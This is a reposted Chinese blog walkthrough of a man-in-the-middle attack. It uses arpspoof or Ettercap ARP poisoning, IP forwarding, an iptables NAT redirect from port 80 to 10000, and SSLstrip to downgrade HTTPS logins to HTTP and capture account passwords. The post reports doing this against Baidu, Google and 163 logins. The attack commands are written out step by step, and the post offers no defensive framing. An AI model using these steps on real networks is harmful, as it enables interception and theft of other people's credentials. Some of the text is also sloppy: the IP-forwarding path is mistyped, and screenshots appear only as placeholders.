[转发]SSLstrip 中间人欺骗Https转Http获取密码

转自:http://www.2cto.com/Article/201305/215024.html


渗透回顾

SSLstrip + EtterCap 中间人攻击实现https转换成http 以获取帐号密码。

Linux环境下 我们使用iptables过滤一下数据包,然后用sslstrip监听端口,获取数据。

数据包转发 echo 1 > /pro/sys/net/ipv4/ip_forward

然后开启Ettercap的iptables 功能

clip_image001

clip_image003

把注析去掉

来个arp欺骗不使用sslstrip 来测试一下https

Arpspoof –i –eth0 –t 192.168.1.102 192.168.1.2

clip_image005

Ok

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

NAT 一定的基础

-T 匹配的表 NAT表 :PREROUTING 修改来的包

:OUTPUT 修改路由前本地的包

:POSTROUTING 修改准备发出的包

-A 表示加入高级选项

-P 协议类型

-J 表示把目标80端口的数据包转到其他端口 上诉命令是10000端口

开启ETTERCAP

Ettercap –T –q –I eth0

clip_image007

clip_image009

登录http的百度 效果良好

监听到数据了

clip_image011

clip_image013

登录google

发现在https 卡顿 无法通过

clip_image014

开启sslstrip

clip_image016

clip_image018

再向google登录的时候 https变成http

clip_image020

成功登录

加载中...

监听到帐号密码

clip_image024

百度的

clip_image026

clip_image028

163的登录

clip_image030

http的跳转

clip_image032

网速过慢……

除了使用arpspoof 还可以使用

Ettercap –T –q –M arp:remote /192.168.1.101/ //

也是arp欺骗 原理一样的

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值